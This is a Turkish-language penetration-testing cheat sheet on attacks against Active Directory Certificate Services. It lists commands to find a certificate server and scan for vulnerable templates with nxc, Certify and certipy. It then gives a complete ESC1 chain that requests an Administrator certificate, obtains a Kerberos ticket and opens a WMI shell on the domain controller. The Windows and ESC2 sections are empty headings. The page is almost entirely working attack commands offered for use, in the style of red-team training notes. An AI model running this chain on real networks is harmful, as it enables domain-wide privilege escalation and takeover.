ADCS Attacks

Sertifika Sunucusu Kontrolü

# Bu local grup var ise sertifika sunucusu vardır
net localgroup "Cert Publishers"
# Sunucunun varlığını nxc ile bulabiliriz
nxc ldap 10.0.0.1 -u "john" -p "pass123" -M adcs

Zafiyetileri Tarama

# Windows
.\Certify.exe find /vulnerable
# Linux
certipy-ad find -u 'john@corp.local' -p 'pass123' -dc-ip 10.0.0.1 -enabled -vulnerable -stdout

ESC1

Linuxtan aşağıdaki şekilde yapılır.

# ESC1 zafiyetini istismar eder
certipy-ad req -u 'john@corp.local' -p 'pass123' -dc-ip 10.0.0.1 -target-ip 10.0.0.1 -ca CORP-DC-CA -template ESC1 -upn Administrator
# Sertifika dosyası ile TGT ister
certipy-ad auth -pfx administrator.pfx -username administrator -domain corp.local -dc-ip 10.0.0.1
# TGT import eder
export KRB5CCNAME=administrator.ccache
# Ticket ile wmi bağlanır
impacket-wmiexec -k -no-pass DC.CORP.LOCAL

Windowstan aşağıdaki şekilde yapılır.

ESC2

Linuxtan aşağıdaki şekilde yapılır.

PreviousActive Directory Trust AttacksNextActive Directory Pentesting

Last updated